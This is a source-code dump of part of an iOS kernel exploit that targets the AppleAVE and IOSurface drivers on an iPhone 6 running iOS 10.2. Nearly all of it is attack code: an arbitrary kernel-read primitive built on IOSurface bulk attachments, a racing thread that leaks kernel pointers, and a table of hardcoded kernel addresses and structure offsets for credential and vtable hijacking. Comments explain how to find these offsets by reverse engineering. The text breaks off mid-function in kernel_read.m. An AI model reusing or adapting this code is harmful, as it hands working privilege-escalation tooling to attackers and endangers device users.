$(LDFLAGS) -o $@ 198 | @echo -en "\t Link time: " 199 | @$(END_TIME) 200 | @echo "Stripping: $@" 201 | @$(START_TIME) 202 | @strip -x $@ 203 | @echo -en "\t Stripping time: " 204 | @$(END_TIME) 205 | 206 | # Add dependency files, if they exist 207 | -include $(DEPS) 208 | 209 | # Source file rules 210 | # After the first compilation they will be joined with the rules from the 211 | # dependency files to provide header dependencies 212 | $(BUILD_PATH)/%.o: $(SRC_PATH)/%.$(SRC_EXT) 213 | @echo "Compiling: $< -> $@" 214 | @$(START_TIME) 215 | $(CMD_PREFIX)$(CXX) $(CXXFLAGS) $(INCLUDES) -MP -MMD -c $< -o $@ 216 | @echo -en "\t Compile time: " 217 | @$(END_TIME) 218 | 219 | -------------------------------------------------------------------------------- /iosurface_utils.m: -------------------------------------------------------------------------------- 1 | #include "iosurface_utils.h" 2 | #include "log.h" 3 | #include "utils.h" 4 | 5 | /* 6 | * Function name: iosurface_utils_get_surface_info 7 | * Description: Gets information about an IOSurface object. Currently just its buffer and its size. 8 | * Returns: kern_return_t, buffer and size in output params. 9 | */ 10 | 11 | kern_return_t iosurface_utils_get_surface_info(io_connect_t conn, uint32_t surface_id, void ** surface_buffer, size_t * buffer_size) { 12 | 13 | kern_return_t ret = KERN_SUCCESS; 14 | uint64_t surface_id_for_lookup = (uint32_t)surface_id; 15 | char output_buffer[IOSURFACE_DICTIONARY_SIZE] = {0}; 16 | size_t output_buffer_size = IOSURFACE_DICTIONARY_SIZE; 17 | 18 | ret = IOConnectCallMethod(conn, 19 | IOSURFACE_EXTERNAL_METHOD_LOOKUP, 20 | &surface_id_for_lookup, 1, 21 | NULL, 0, 22 | NULL, 0, 23 | output_buffer, &output_buffer_size); 24 | 25 | if (KERN_SUCCESS != ret) 26 | { 27 | ERROR_LOG("Error looking up for surface %d", surface_id); 28 | goto cleanup; 29 | } 30 | 31 | if (surface_buffer) 32 | { 33 | *surface_buffer = *(void**)output_buffer; 34 | } 35 | if (buffer_size) 36 | { 37 | *buffer_size = *(size_t*)((char*)output_buffer + 0x14); 38 | } 39 | 40 | cleanup: 41 | return ret; 42 | } 43 | 44 | 45 | 46 | /* 47 | * Function name: iosurface_utils_set_bulk_attachment 48 | * Description: Wrapper for the IOSurface::setBulkAttachment function. 49 | * Returns: kern_return_t. 50 | */ 51 | 52 | kern_return_t iosurface_utils_set_bulk_attachment(io_connect_t conn, uint32_t surface_id, void * bulk_data) { 53 | 54 | kern_return_t ret = KERN_SUCCESS; 55 | uint64_t surface_id_for_bulks = (uint32_t)surface_id; 56 | 57 | *(uint64_t*)((char*)bulk_data + 0x50) = surface_id_for_bulks; 58 | 59 | ret = IOConnectCallMethod(conn, 60 | IOSURFACE_EXTERNAL_METHOD_SET_BULK_ATTACHMENT, 61 | NULL, 0, 62 | bulk_data, IOSURFACE_BULK_ATTACHMENT_SIZE, 63 | NULL, 0, 64 | NULL, 0); 65 | 66 | return ret; 67 | } 68 | 69 | /* 70 | * Function name: iosurface_utils_get_bulk_attachment 71 | * Description: Wrapper for the IOSurface::getBulkAttachment function. 72 | * Returns: kern_return_t. 73 | */ 74 | 75 | kern_return_t iosurface_utils_get_bulk_attachment(io_connect_t conn, uint32_t surface_id, char * bulk_data_out) { 76 | 77 | kern_return_t ret = KERN_SUCCESS; 78 | uint64_t surface_id_for_bulks = (uint32_t)surface_id; 79 | size_t output_buffer_size = IOSURFACE_BULK_ATTACHMENT_SIZE; 80 | 81 | ret = IOConnectCallMethod(conn, 82 | IOSURFACE_EXTERNAL_METHOD_GET_BULK_ATTACHMENT, 83 | &surface_id_for_bulks, 1, 84 | NULL, 0, 85 | NULL, 0, 86 | bulk_data_out, &output_buffer_size); 87 | 88 | return ret; 89 | } 90 | 91 | 92 | /* 93 | * Function name: iosurface_utils_set_data_for_arbitrary_read 94 | * Description: When using the arbitrary read vulnerability, we have to overcome a triple deref sequence. 95 | So using set_bulk_attachment, we can control both IOSuface+0x20 96 | and IOSurface+0x30 (and other offsets). 97 | This allows us to easily (and deterministically) leak any kernel address we want. 98 | * Returns: kern_return_t from the set_bulk_attachment call. 99 | */ 100 | 101 | kern_return_t iosurface_utils_set_data_for_arbitrary_read(io_connect_t conn, uint32_t surface_id, 102 | void * surface_kernel_address, 103 | void * address_to_read) { 104 | 105 | kern_return_t ret = KERN_SUCCESS; 106 | char input_buffer[IOSURFACE_BULK_ATTACHMENT_SIZE] = {0}; 107 | *(uint32_t*)(input_buffer + 0x50) = surface_id; 108 | *(uint32_t*)(input_buffer + 0x48) = 1; 109 | 110 | /* 111 | Here we completely control the X8 we load from. 112 | We want it to load from IOSurface+0x20. Therefore we set it to surface_kernel_address + 0x20 113 | LDR X8, [X8,#0x10] ; Load from Memory 114 | */ 115 | *(void**)(input_buffer) = surface_kernel_address + 0x20; /* IOSurface+0x20 = surface_kernel_address + 0x20 */ 116 | 117 | /* 118 | Here the initial X8 equals to IOSurface+0x20. So we take *(IOSurface+0x28) on that case. 119 | LDR X8, [X8,#8] ; Load from Memory 120 | LDR W8, [X8,#0xC] ; Load from Memory 121 | STR W8, [X2] ; Store to Memory 122 | */ 123 | *(void**)(input_buffer + 8) = address_to_read - 0xC; 124 | 125 | ret = iosurface_utils_set_bulk_attachment(conn, surface_id, input_buffer); 126 | 127 | 128 | return ret; 129 | } 130 | 131 | 132 | 133 | /* 134 | * Function name: iosurface_utils_release_surface 135 | * Description: Releases an IOSurface. 136 | * Returns: kern_return_t. 137 | */ 138 | 139 | kern_return_t iosurface_utils_release_surface(io_connect_t connection, uint32_t surface_id_to_free) { 140 | 141 | kern_return_t ret = KERN_SUCCESS; 142 | uint64_t surface_id = (uint32_t)surface_id_to_free; 143 | 144 | ret = IOConnectCallMethod(connection, 145 | IOSURFACE_EXTERNAL_METHOD_RELEASE, 146 | &surface_id, 1, 147 | NULL, 0, 148 | NULL, 0, 149 | NULL, 0); 150 | 151 | if (KERN_SUCCESS != ret) 152 | { 153 | ERROR_LOG("Error releasing surface ID %d", surface_id_to_free); 154 | goto cleanup; 155 | } 156 | 157 | cleanup: 158 | return ret; 159 | } 160 | 161 | 162 | /* 163 | * Function name: iosurface_utils_create_surface 164 | * Description: Creates an IOSurface object. 165 | * Returns: kern_return_t with the IOKit call. 166 | Additionally, the IOSurface ID will be returned as an output parameter. 167 | */ 168 | 169 | kern_return_t iosurface_utils_create_surface(io_connect_t connection, uint32_t * surface_id_out, void * output_buffer_ptr) { 170 | 171 | kern_return_t ret = KERN_SUCCESS; 172 | char buf[0x1000] = {0}; 173 | 174 | char output_buffer[IOSURFACE_DICTIONARY_SIZE] = {0}; 175 | size_t output_buffer_size = sizeof(output_buffer); 176 | 177 | strcpy(buf, ""); 178 | strcat(buf, "IOSurfaceWidth"); 179 | strcat(buf, "100"); 180 | strcat(buf, "IOSurfaceHeight"); 181 | strcat(buf, "100"); 182 | strcat(buf, "IOSurfaceElementHeight"); 183 | strcat(buf, "10"); 184 | strcat(buf, "IOSurfaceElementWidth"); 185 | strcat(buf, "10"); 186 | strcat(buf, "IOSurfaceBytesPerElement"); 187 | strcat(buf, "1000"); 188 | strcat(buf, "IOSurfaceIsGlobal"); 189 | strcat(buf, ""); 190 | strcat(buf, ""); 191 | 192 | ret = IOConnectCallMethod(connection, 193 | IOSURFACE_EXTERNAL_METHOD_CREATE, 194 | NULL, 195 | 0, 196 | buf, 197 | strlen(buf) + 1, 198 | NULL,NULL, 199 | output_buffer, &output_buffer_size); 200 | 201 | if (KERN_SUCCESS != ret) 202 | { 203 | ERROR_LOG("Error creating IOSurface"); 204 | goto cleanup; 205 | } 206 | 207 | *surface_id_out = *(uint32_t*)(output_buffer + IOSURFACE_SURFACE_ID_OFFSET); 208 | if (output_buffer_ptr) 209 | { 210 | memcpy(output_buffer_ptr, output_buffer, sizeof(output_buffer)); 211 | } 212 | 213 | 214 | 215 | cleanup: 216 | return ret; 217 | } 218 | 219 | 220 | 221 | /* 222 | * Function name: iosurface_utils_get_connection 223 | * Description: Obtains a connection to an IOSurfaceRoot object. 224 | * Returns: kern_return_t from the kernel. Accepts also an output parameter for an io_connect_t 225 | */ 226 | kern_return_t iosurface_utils_get_connection(io_connect_t * conn_out) { 227 | 228 | kern_return_t ret = KERN_SUCCESS; 229 | io_connect_t connection = 0; 230 | mach_port_t master_port = 0; 231 | io_iterator_t itr = 0; 232 | io_service_t service = 0; 233 | 234 | ret = host_get_io_master(mach_host_self(), &master_port); 235 | if (KERN_SUCCESS != ret) 236 | { 237 | ERROR_LOG("Failed getting master port"); 238 | goto cleanup; 239 | } 240 | 241 | ret = IOServiceGetMatchingServices(master_port, IOServiceMatching(IOSURFACE_IOKIT_SERVICE), &itr); 242 | if (KERN_SUCCESS != ret) 243 | { 244 | ERROR_LOG("Failed getting matching services"); 245 | goto cleanup; 246 | } 247 | 248 | while(IOIteratorIsValid(itr) && (service = IOIteratorNext(itr))) { 249 | ret = IOServiceOpen(service, mach_task_self(), 0, &connection); 250 | if (KERN_SUCCESS != ret) 251 | { 252 | continue; 253 | } 254 | } 255 | 256 | cleanup: 257 | 258 | if (KERN_SUCCESS == ret) 259 | { 260 | *conn_out = connection; 261 | } 262 | 263 | if (itr) 264 | { 265 | itr = 0; 266 | } 267 | 268 | return ret; 269 | 270 | } 271 | 272 | /* 273 | * Function name: iosurface_utils_do_set_value 274 | * Description: The actual call to the set_value external method. 275 | * Returns: kern_return_t. 276 | */ 277 | 278 | static 279 | kern_return_t iosurface_utils_do_set_value(io_connect_t conn, void * input_buffer, size_t input_buffer_size) { 280 | 281 | kern_return_t ret = KERN_SUCCESS; 282 | uint64_t output_buffer = 0; 283 | size_t output_buffer_count = 4; 284 | 285 | ret = IOConnectCallMethod(conn, IOSURFACE_EXTERNAL_METHOD_CREATE_SET_VALUE, 286 | NULL, 287 | 0, 288 | input_buffer, input_buffer_size, 289 | NULL, NULL, 290 | &output_buffer, &output_buffer_count); 291 | 292 | return ret; 293 | 294 | } 295 | 296 | 297 | 298 | /* 299 | * Function name: iosurface_utils_set_value 300 | * Description: Wrapper for the set value external method. 301 | * Returns: kern_return_t. 302 | */ 303 | 304 | kern_return_t iosurface_utils_set_value(io_connect_t conn, uint32_t surface_id, 305 | const char * key, char * data) { 306 | 307 | kern_return_t ret = KERN_SUCCESS; 308 | char input_buffer[0x1000] = {0}; /* maximum allowance */ 309 | char * input_buffer_ptr = input_buffer; 310 | size_t i = 0; 311 | size_t data_length = strlen(data); 312 | 313 | *(uint64_t*)(input_buffer_ptr) = surface_id; 314 | input_buffer_ptr += sizeof(uint64_t); 315 | 316 | strcpy(input_buffer_ptr, ""); 317 | for(i = 0; i < 0x900/data_length; ++i) { 318 | strcat(input_buffer_ptr, ""); 319 | sprintf(input_buffer_ptr + strlen(input_buffer_ptr), "%c", (char)('1' + i)); 320 | strcat(input_buffer_ptr, ""); 321 | strcat(input_buffer_ptr, data); 322 | strcat(input_buffer_ptr, ""); 323 | } 324 | sprintf(input_buffer_ptr + strlen(input_buffer_ptr), "%s", key); 325 | 326 | ret = iosurface_utils_do_set_value(conn, input_buffer, strlen(input_buffer_ptr) + sizeof(uint64_t) + 1); 327 | if (KERN_SUCCESS != ret) 328 | { 329 | ERROR_LOG("Error setting value for surface %d", surface_id); 330 | goto cleanup; 331 | } 332 | 333 | cleanup: 334 | return ret; 335 | } 336 | 337 | -------------------------------------------------------------------------------- /offsets.m: -------------------------------------------------------------------------------- 1 | #include "offsets.h" 2 | #include "log.h" 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #import 10 | 11 | static offsets_t g_offsets; 12 | static void * g_kernel_base = NULL; 13 | 14 | 15 | /* 16 | * Function name: offsets_get_kernel_base 17 | * Description: Gets the kernel base. 18 | * Returns: void *. 19 | */ 20 | 21 | void * offsets_get_kernel_base() { 22 | 23 | return g_kernel_base; 24 | } 25 | 26 | /* 27 | * Function name: offsets_set_kernel_base 28 | * Description: Sets the kernel base. 29 | * Returns: void. 30 | */ 31 | 32 | void offsets_set_kernel_base(void * kernel_base) { 33 | 34 | g_kernel_base = kernel_base; 35 | } 36 | 37 | 38 | 39 | 40 | /* 41 | * Function name: offsets_get_offsets 42 | * Description: Gets the main offsets object. 43 | * Returns: offsets_t. 44 | */ 45 | 46 | offsets_t offsets_get_offsets() { 47 | 48 | return g_offsets; 49 | } 50 | 51 | 52 | 53 | typedef void (*init_func)(void); 54 | 55 | void init_iphone_6_14c92() { 56 | 57 | g_offsets.kernel_base = 0xFFFFFFF0060CC000; 58 | 59 | /* 60 | Find the string "AVE ERROR: SetSessionSettings chroma_format_idc = %d." 61 | There's only one usage. The branch is being called from the same place. 62 | There's a check whether 0 <= chroma <= 4, Taken from *(X19 + W8) 63 | The only call from that branch is just below a lot of memcpys. 64 | 65 | Let's say that W8 is 0x4AD0 (our case for that symbol). 66 | We see that there's a memcpy(X19 + 0x4AA8, X27 + 0x3B70, 0x5AC) 67 | Our chroma offset falls within that memcpy. 68 | So if 0x4AD0 is the chroma offset, 0x4AD0 - 0x4AA8 == 0x28. 69 | The memcpy from our controlled input starts at 0x3B70 in that case. 70 | Therefore the chroma format offset is 0x3B70 + 0x28. 71 | */ 72 | g_offsets.encode_frame_offset_chroma_format_idc = (0x3B70+0x28); 73 | 74 | /* 75 | The same as before goes here, ui32Width is being checked, it has to be > 0xC0 76 | It just checked just slightly after the chroma format IDC check. 77 | We see that the memcpy that is responsible for copying ui32Width looks like that: 78 | memcpy(X19 + 0x194C, X27 + 0xA14) 79 | X28 is ui32Width in our case, which is X19 + 0x194C. 80 | Therefore 0xA14 is ui32Width in our case 81 | */ 82 | g_offsets.encode_frame_offset_ui32_width = (0xA10+4); 83 | 84 | /* 85 | Just the same explanation as before, but instead of 0x194C, 0x1950 is being checked. 86 | Hence we just increase by 4, because it is being copied by the same memcpy as before. 87 | */ 88 | g_offsets.encode_frame_offset_ui32_height = (0xA10+8); 89 | 90 | /* 91 | Pretty much the same like before. String reference is "AVE ERROR: SlicesPerFrame = %d" this time. 92 | Slices per frame is being checked at offset 0x1CC0. 93 | The responsible memcpy is memcpy(X19 + 0x1C90, X27 + 0xD58, 0x2E18) 94 | 0x1CC0 - 0x1C90 == 0x30. 95 | It starts to be copied from our input buffer at offset 0xD58. 96 | Hence the offset, 0xD58(where our input buffer is being copied) + 0x30(offset from copied dest starting point) 97 | */ 98 | g_offsets.encode_frame_offset_slice_per_frame = (0xD58+0x30); 99 | 100 | /* 101 | I don't think it's ever going to change.. 102 | */ 103 | g_offsets.encode_frame_offset_info_type = (0x10); 104 | 105 | /* 106 | There are 2 usages of the following string: 107 | "AVE WARNING: m_PoweredDownWithClientsStillRegistered = true - ask to reset, the HW is in a bad state..." 108 | One just slightly above an IOMalloc(0x28), one somewhere else. 109 | Go to the one above the IOMalloc. 110 | Above the IOMalloc there's something that looks like the following: 111 | LDR X0, [X23,#0x11D8] 112 | CBNZ X0, somewhere 113 | MOV W0, #0x28 114 | BL _IOMalloc 115 | STR X0, [X23,#0x11D8] 116 | 117 | The offset is where the IOMalloc put its allocated address. 118 | */ 119 | g_offsets.encode_frame_offset_iosurface_buffer_mgr = (0x11D8); 120 | 121 | /* 122 | Find the following string: 123 | "AVE ERROR: IMG_V_EncodeAndSendFrame multiPassEndPassCounterEnc (%d) >= H264VIDEOENCODER_MULTI_PASS_PASSES\n" 124 | That's the check that, if not passed, leads to the print of that string: 125 | LDR W25, [X22,#0xC] 126 | CMP W25, #2 127 | B.CC somewhere 128 | 129 | The offset from X22 is what we should put here. 130 | */ 131 | g_offsets.kernel_address_multipass_end_pass_counter_enc = (0xC); 132 | 133 | /* 134 | There's a string "inputYUV" which is being used twice. 135 | One time, just above _mach_absolute_time, one time somewhere else. 136 | Above it, we see the following: 137 | MOV W8, #0x4A88 138 | LDRB W7, [X19,X8] 139 | 140 | Just like before, the X19 is from our memcpy, so we see that the responsible memcpy is: 141 | memcpy(X19 + 0x1C90, X27 + 0xD58, 0x2E18) 142 | 143 | So 0x4A88 - 0x1C90 == 0x2DF8 144 | So 0x2DF8 + 0xD58(that's where they start copying from our input buffer) == 0x3B50. 145 | */ 146 | g_offsets.encode_frame_offset_keep_cache = (0x3B50); 147 | 148 | /* Vtable address of IOSurface */ 149 | 150 | g_offsets.iofence_vtable_offset = 0xFFFFFFF006EF4B08 - g_offsets.kernel_base; 151 | 152 | /* IOFence current fences list head in the IOSurface object */ 153 | 154 | g_offsets.iosurface_current_fences_list_head = 0x210; 155 | 156 | g_offsets.panic = 0xFFFFFFF0070B6DD0 - g_offsets.kernel_base; 157 | 158 | g_offsets.osserializer_serialize = 0xFFFFFFF00745B0DC - g_offsets.kernel_base; 159 | 160 | g_offsets.copyin = 0xFFFFFFF00718F748 - g_offsets.kernel_base; 161 | 162 | g_offsets.copyout = 0xFFFFFFF00718F950 - g_offsets.kernel_base; 163 | 164 | g_offsets.all_proc = 0xfffffff0075bc468 - g_offsets.kernel_base; 165 | 166 | g_offsets.kern_proc = 0xFFFFFFF0075C20E0 - g_offsets.kernel_base; 167 | 168 | g_offsets.l1dcachesize_handler = 0xFFFFFFF00753A628 - g_offsets.kernel_base; 169 | 170 | g_offsets.l1dcachesize_string = 0xFFFFFFF007057890 - g_offsets.kernel_base; 171 | 172 | g_offsets.l1icachesize_string = 0xFFFFFFF007057883 - g_offsets.kernel_base; 173 | 174 | g_offsets.quad_format_string = 0xFFFFFFF007069601 - g_offsets.kernel_base; 175 | 176 | g_offsets.null_terminator = 0xFFFFFFF00706A407 - g_offsets.kernel_base; 177 | 178 | g_offsets.cachesize_callback = 0xFFFFFFF0073BE284 - g_offsets.kernel_base; 179 | 180 | g_offsets.sysctl_hw_family = 0xFFFFFFF00753A678 - g_offsets.kernel_base; 181 | 182 | g_offsets.ret_gadget = 0xFFFFFFF0070B55B8 - g_offsets.kernel_base; 183 | 184 | g_offsets.struct_proc_p_comm = 0x26C; 185 | 186 | g_offsets.struct_proc_p_ucred = 0x100; 187 | 188 | g_offsets.struct_kauth_cred_cr_ref = 0x10; 189 | 190 | g_offsets.struct_proc_p_uthlist = 0x98; 191 | 192 | g_offsets.struct_uthread_uu_ucred = 0x168; 193 | 194 | g_offsets.struct_uthread_uu_list = 0x170; 195 | 196 | /* 197 | IOSurface->lockSurface 198 | Find "H264IOSurfaceBuf ERROR: lockSurface failed." 199 | Both strings have BLR X8 above them. 200 | Find the nearest LDR X8, [something, OFFSET]. 201 | The OFFSET is mostly 0x98. If something else, then change this. 202 | */ 203 | g_offsets.iosurface_vtable_offset_kernel_hijack = 0x98; 204 | 205 | } 206 | 207 | /* 208 | * Function name: offsets_get_os_build_version 209 | * Description: Gets a string with the OS's build version. 210 | * Returns: kern_return_t and os build version in output param. 211 | */ 212 | 213 | static 214 | kern_return_t offsets_get_os_build_version(char * os_build_version) { 215 | 216 | kern_return_t ret = KERN_SUCCESS; 217 | int mib[2] = {CTL_KERN, KERN_OSVERSION}; 218 | uint32_t namelen = sizeof(mib) / sizeof(mib[0]); 219 | size_t buffer_size = 0; 220 | char * errno_str = NULL; 221 | 222 | ret = sysctl(mib, namelen, NULL, &buffer_size, NULL, 0); 223 | if (KERN_SUCCESS != ret) 224 | { 225 | errno_str = strerror(errno); 226 | ERROR_LOG("error getting OS version's buffer size: %s", errno_str); 227 | goto cleanup; 228 | } 229 | 230 | ret = sysctl(mib, namelen, os_build_version, &buffer_size, NULL, 0); 231 | if (KERN_SUCCESS != ret) 232 | { 233 | errno_str = strerror(errno); 234 | ERROR_LOG("Error getting OS version: %s", errno_str); 235 | goto cleanup; 236 | } 237 | 238 | cleanup: 239 | return ret; 240 | } 241 | 242 | /* 243 | * Function name: offsets_get_device_type_and_version 244 | * Description: Gets the device type and version. 245 | * Returns: kern_return_t and data in output params. 246 | */ 247 | 248 | static 249 | kern_return_t offsets_get_device_type_and_version(char * machine, char * build) { 250 | 251 | kern_return_t ret = KERN_SUCCESS; 252 | struct utsname u; 253 | char os_build_version[0x100] = {0}; 254 | 255 | memset(&u, 0, sizeof(u)); 256 | 257 | ret = uname(&u); 258 | if (ret) 259 | { 260 | ERROR_LOG("Error uname-ing"); 261 | goto cleanup; 262 | } 263 | 264 | ret = offsets_get_os_build_version(os_build_version); 265 | if (KERN_SUCCESS != ret) 266 | { 267 | ERROR_LOG("Error getting OS Build version!"); 268 | goto cleanup; 269 | } 270 | 271 | strcpy(machine, u.machine); 272 | strcpy(build, os_build_version); 273 | 274 | cleanup: 275 | return ret; 276 | } 277 | 278 | 279 | /* 280 | * Function name: offsets_determine_initializer_for_device_and_build 281 | * Description: Determines which function should be used as an initializer for the device and build given. 282 | * Returns: kern_return_t and func pointer as an output param. 283 | */ 284 | 285 | static 286 | kern_return_t offsets_determine_initializer_for_device_and_build(char * device, char * build, init_func * func) { 287 | 288 | kern_return_t ret = KERN_INVALID_HOST; 289 | 290 | if (strstr(device, "iPhone7,2")) 291 | { 292 | DEBUG_LOG("Detected iPhone 6"); 293 | if (strstr(build, "14C92")) 294 | { 295 | DEBUG_LOG("Initializing for iOS 10.2"); 296 | *func = (init_func)init_iphone_6_14c92; 297 | ret = KERN_SUCCESS; 298 | } 299 | else { 300 | ERROR_LOG("Unsupported phone version. quitting."); 301 | goto cleanup; 302 | } 303 | } else { 304 | ERROR_LOG("Unsupported device. quitting."); 305 | goto cleanup; 306 | } 307 | 308 | cleanup: 309 | return ret; 310 | } 311 | 312 | 313 | 314 | 315 | /* 316 | * Function name: offsets_get_init_func 317 | * Description: Determines which initialization function should be used for the current build. 318 | * Returns: kern_return_t and function pointer in output params. 319 | */ 320 | 321 | static 322 | kern_return_t offsets_get_init_func(init_func * func) { 323 | 324 | kern_return_t ret = KERN_SUCCESS; 325 | 326 | char machine[0x100] = {0}; 327 | char build[0x100] = {0}; 328 | 329 | ret = offsets_get_device_type_and_version(machine, build); 330 | if (KERN_SUCCESS != ret) 331 | { 332 | ERROR_LOG("Error getting device type and build version"); 333 | goto cleanup; 334 | } 335 | 336 | DEBUG_LOG("machine: %s", machine); 337 | DEBUG_LOG("build: %s", build); 338 | 339 | ret = offsets_determine_initializer_for_device_and_build(machine, build, func); 340 | if (KERN_SUCCESS != ret) 341 | { 342 | ERROR_LOG("Error finding the appropriate function loader for the specific host"); 343 | goto cleanup; 344 | } 345 | 346 | 347 | cleanup: 348 | return ret; 349 | } 350 | 351 | 352 | 353 | 354 | /* 355 | * Function name: offsets_init 356 | * Description: Initializes offsets for the current build running. 357 | * Returns: int - zero for success, otherwise non-zero. 358 | */ 359 | 360 | kern_return_t offsets_init() { 361 | 362 | kern_return_t ret = 0; 363 | init_func func = NULL; 364 | 365 | memset(&g_offsets, 0, sizeof(g_offsets)); 366 | 367 | ret = offsets_get_init_func(&func); 368 | if (KERN_SUCCESS != ret) 369 | { 370 | ERROR_LOG("Error initializing offsets. No exploit for you!"); 371 | goto cleanup; 372 | } 373 | 374 | func(); 375 | 376 | cleanup: 377 | return ret; 378 | } 379 | 380 | -------------------------------------------------------------------------------- /kernel_read.m: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include "iosurface_utils.h" 8 | #include "apple_ave_pwn.h" 9 | #include "apple_ave_utils.h" 10 | #include "log.h" 11 | #include "kernel_read.h" 12 | #include "offsets.h" 13 | 14 | static io_connect_t g_surface_conn = 0; 15 | static void * g_surface_kernel_ptr = NULL; 16 | static void * g_surface_buffer = NULL; 17 | static uint32_t g_surface_id_for_arbitrary_read = 0; 18 | 19 | 20 | /* exclusively for printing 21 | static pthread_mutex_t g_m = PTHREAD_MUTEX_INITIALIZER; 22 | */ 23 | 24 | typedef struct bulk_racer_args_s { 25 | int * should_stop; 26 | void * address_target; 27 | uint64_t * out_value; 28 | uint64_t expected_value; 29 | uint64_t mask; 30 | } bulk_racer_args_t; 31 | 32 | /* 33 | * Function name: kernel_read_cleanup 34 | * Description: Frees resources required by the arbitrary kernel read vulnerability. 35 | * Returns: kern_return_t. 36 | */ 37 | 38 | kern_return_t kernel_read_cleanup() { 39 | 40 | kern_return_t ret = KERN_SUCCESS; 41 | 42 | if (g_surface_id_for_arbitrary_read) 43 | { 44 | iosurface_utils_release_surface(g_surface_conn, g_surface_id_for_arbitrary_read); 45 | g_surface_id_for_arbitrary_read = 0; 46 | } 47 | 48 | if (g_surface_conn) 49 | { 50 | IOServiceClose(g_surface_conn); 51 | g_surface_conn = 0; 52 | } 53 | return ret; 54 | } 55 | 56 | 57 | /* 58 | * Function name: kernel_read_initialize_globals 59 | * Description: Initializes IOKit connections and their objects. 60 | * Returns: kern_return_t. 61 | */ 62 | 63 | static 64 | kern_return_t kernel_read_initialize_globals() { 65 | 66 | kern_return_t ret = KERN_SUCCESS; 67 | char surface_data[IOSURFACE_DICTIONARY_SIZE] = {0}; 68 | ret = iosurface_utils_get_connection(&g_surface_conn); 69 | if (KERN_SUCCESS != ret) 70 | { 71 | ERROR_LOG("Error opening IOSurfaceRoot connection"); 72 | goto cleanup; 73 | } 74 | 75 | ret = iosurface_utils_create_surface(g_surface_conn, &g_surface_id_for_arbitrary_read, surface_data); 76 | if (KERN_SUCCESS != ret) 77 | { 78 | ERROR_LOG("Error creating an IOSurface for arbitrary read"); 79 | goto cleanup; 80 | } 81 | 82 | g_surface_buffer = *(void**)surface_data; 83 | 84 | cleanup: 85 | if (KERN_SUCCESS != ret) 86 | { 87 | kernel_read_cleanup(); 88 | } 89 | return ret; 90 | } 91 | 92 | /* 93 | * Function name: kernel_read_surface_bulk_race_thread 94 | * Description: Sets the bulk attachment appropriately for the info leak and checks if its actually rewritten. 95 | * Returns: kern_return_t. 96 | */ 97 | 98 | static 99 | void* kernel_read_surface_bulk_race_thread(void * _args) { 100 | 101 | kern_return_t ret = KERN_SUCCESS; 102 | bulk_racer_args_t * args = (bulk_racer_args_t*)_args; 103 | char input_buffer[IOSURFACE_BULK_ATTACHMENT_SIZE] = {0}; 104 | char output_buffer[IOSURFACE_BULK_ATTACHMENT_SIZE] = {0}; 105 | unsigned long counter = 0; 106 | void * should_stop = args->should_stop; 107 | 108 | *(void**)input_buffer = args->address_target; 109 | 110 | usleep(100000); 111 | 112 | /* 113 | We want to leak fenceWaitingQueue. As a result, bulk0 must be NULL. 114 | so we put the address of fenceWaitingQueue-0x38. 115 | In that case, fenceWaitingQueue will be leaked (base+0x38), and base+0x50 will be NULL (bulk0). 116 | 00000210 fenceCurrentQueue DCQ ? ; offset 117 | 00000218 fenceCurrentQueueTail DCQ ? ; offset 118 | 00000220 fenceWaitingQueue DCQ ? ; offset 119 | 00000228 fenceWaitingQueueTail DCQ ? ; offset 120 | 00000230 fence_allow_tearing DCB ? 121 | 00000231 field_0x231 DCB ? 122 | 00000232 field_0x232 DCB ? 123 | 00000233 field_0x233 DCB ? 124 | 00000234 bulk0 (null) ? 125 | 00000244 bulk1 (null) ? 126 | 00000254 bulk2 (null) ? 127 | 00000264 bulk3 DCQ ? ; offset 128 | 0000026C bulk4 DCB ? 129 | 0000026D bulk5 DCB ? 130 | 0000026E YcbCr_matrix_also DCB ? 131 | 0000026F bulk6 DCB ? 132 | 00000270 bulk7 DCB ? 133 | 00000271 bulk8 DCB ? 134 | 00000272 bulk9 DCB ? 135 | 00000273 bulk10 DCB ? 136 | */ 137 | 138 | iosurface_utils_set_bulk_attachment_flag(input_buffer, 1); 139 | 140 | DEBUG_LOG("block to leak: %p", *(void**)input_buffer); 141 | 142 | while(!*(int*)should_stop) { 143 | 144 | if (counter++ >= 0x10000) 145 | { 146 | DEBUG_LOG("timeout leak"); 147 | break; 148 | } 149 | 150 | ret = iosurface_utils_set_bulk_attachment(g_surface_conn, g_surface_id_for_arbitrary_read, 151 | input_buffer); 152 | 153 | if (KERN_SUCCESS != ret) 154 | { 155 | ERROR_LOG("Error setting bulk attachment"); 156 | break; 157 | } 158 | 159 | ret = iosurface_utils_get_bulk_attachment(g_surface_conn, g_surface_id_for_arbitrary_read, 160 | output_buffer); 161 | 162 | if (KERN_SUCCESS != ret) 163 | { 164 | ERROR_LOG("Error getting bulk attachment"); 165 | } 166 | 167 | if (NULL != *(void**)(output_buffer+0x20) && 0 == *(uint32_t*)(output_buffer + 0x8)) 168 | { 169 | if (args->mask && ((*(uint64_t*)(output_buffer + 0x20) & args->mask) != (args->expected_value & args->mask))) 170 | { 171 | DEBUG_LOG("0x%llx & 0x%llx (0x%llx) != 0x%llx & 0x%llx (0x%llx)", 172 | *(uint64_t*)(output_buffer + 0x20), args->mask, 173 | *(uint64_t*)(output_buffer + 0x20) & args->mask, 174 | args->expected_value, args->mask, 175 | args->expected_value & args->mask); 176 | continue; 177 | } 178 | 179 | /* This value means the race failed. */ 180 | if (*(unsigned int*)(output_buffer + 0x20) == 0xf6000) 181 | { 182 | continue; 183 | } 184 | 185 | DEBUG_LOG("Leaked IOMemoryDescriptor: %p", *(void**)(output_buffer+0x20)); 186 | *args->out_value = *(uint64_t*)(output_buffer + 0x20); 187 | break; 188 | } 189 | } 190 | 191 | /* 192 | pthread_mutex_lock(&g_m); 193 | DEBUG_LOG("Bulk setter quitted"); 194 | for(i = 0; i <= 0x20; i += 8) { 195 | DEBUG_LOG("leak[0x%x] = %p", i, *(void**)(output_buffer+i)); 196 | } 197 | pthread_mutex_unlock(&g_m); 198 | */ 199 | *(int*)should_stop = 1; 200 | 201 | #pragma clang diagnostic push 202 | #pragma clang diagnostic ignored "-Wint-conversion" 203 | return ret; 204 | #pragma clang diagnostic pop 205 | 206 | } 207 | 208 | /* 209 | * Function name: kernel_read_wait_for_all_threads 210 | * Description: Joins an array of pthread_t. 211 | * Returns: void. 212 | */ 213 | 214 | static 215 | void kernel_read_wait_for_all_threads(pthread_t * threads, size_t 